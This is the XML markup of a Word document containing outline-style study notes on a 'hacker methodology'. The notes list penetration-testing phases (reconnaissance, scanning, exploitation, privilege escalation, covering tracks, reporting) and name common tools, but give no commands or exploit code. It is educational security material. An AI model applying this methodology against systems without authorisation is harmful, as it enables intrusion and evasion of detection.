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155C4" w14:textId="5DF4E99B" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The Hacker Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A542FB1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Methodology Outline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB6A44C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC9A8FD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2264C04A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration/Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E318A36" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8FFD5B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F74754" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24782EFE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AF9912" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reconnaissance Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890165D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Collecting information about the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB6CAED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Usually requires no interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193911C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Google Dorking Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35329CB0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Wikipedia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1EAA5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Peoplefinder.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5183AC8F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Who.is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437FC417" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17926D8A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hunter.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67811009" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Builtwith.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D511F5B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2CCA17" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Publicly available tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D519AA4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration and Scanning Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA64797" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Second Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1546AB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Beginning of interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744EDA8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>More specialized tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E1036" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Nmap, dirb, Metasploit, exploit-db, burpsuite, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A0BAB7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Determine overall attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5227C2D0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Determines what the target might be vulnerable to in the exploitation phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A699893" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Improper lockdown, info leaks, SQL Injections, XSS, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F38A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Determine what ports are open, OS, services and versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC9B03" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dirb – commonly-named directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD374BE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dirbuster – similar to dirb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E326EC5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enum4linux – helps find vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD072ED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5D581" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C5C73" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00239687" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Only as good as recon and enumeration phases before it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705257FC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Must enumerate all vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22065F6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit, burpsuite, SQLMap, msfvenom, BeEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987AAA4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA51D0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Higher user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511522E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Administrator or system for windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648AA2B3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Root for linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35908DC3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Discover OS first to determine privilege escalation methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B386D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Password cracking hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0651F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Vuln services or versions through service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC42098" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Default credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2321E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Secret keys or SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7E3EC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
